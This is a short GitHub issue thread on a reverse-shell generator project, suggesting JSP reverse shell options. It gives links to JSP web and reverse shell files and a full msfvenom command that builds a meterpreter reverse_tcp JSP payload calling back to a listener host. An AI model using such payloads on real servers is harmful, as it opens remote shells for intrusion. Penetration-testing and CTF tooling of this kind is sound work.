### ISSUE TITLE
Some JSP revshell ideas

### ISSUE THREAD

**Issue by noraj** [0dayCTF/reverse-shell-generator#122]
- [ ] https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp
- [ ] https://github.com/LaiKash/JSP-Reverse-and-Web-Shell/blob/main/shell.jsp (2 way : web + rev)
- [ ] `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f jsp -o ./rev.jsp`

**Comment by 0dayCTF** [comment]
Added, thank you @noraj
